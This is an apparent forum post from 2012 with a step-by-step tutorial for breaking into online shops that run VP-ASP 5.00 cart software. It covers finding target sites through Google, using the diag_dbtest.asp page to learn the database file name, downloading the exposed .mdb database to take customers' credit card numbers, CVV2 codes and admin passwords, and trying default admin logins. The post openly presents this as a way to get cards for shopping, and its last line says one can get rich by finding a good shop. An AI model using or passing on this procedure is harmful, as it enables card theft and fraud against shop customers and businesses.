sandabot Posted March 6, 2012 Report Posted March 6, 2012 (edited) This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.Lets start:Type: VP-ASP Shopping CartVersion: 5.00How to find VP-ASP 5.00 sites?Finding VP-ASP 5.00 sites is so simple...1. Go to google.com and type: VP-ASP Shopping Cart 5.002. You will find many websites with VP-ASP 5.00 cart software installedNow let's go to the exploit..The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.aspThe exploit is: diag_dbtest.aspNow you need to do this: ****://***.victim.com/shop/diag_dbtest.aspA page will appear contain those:xDatabaseshopping140xDblocationresxxdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe rExample:The most important thing here is xDatabasexDatabase: shopping140Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdbIf you didn't download the Database, try this while there is dblocation:xDblocationresxthe url will be: ****://***.victim.com/shop/resx/shopping140.mdbIf u see the error message you have to try this :****://***.victim.com/shop/shopping500.mdbDownload the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.aspIf you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:Username: adminpassword: adminORUsername: vpasppassword: vpasp//mai pe simplu puteti sa va facei bogati daca gasiti un shop bun Edited March 6, 2012 by sandabot Quote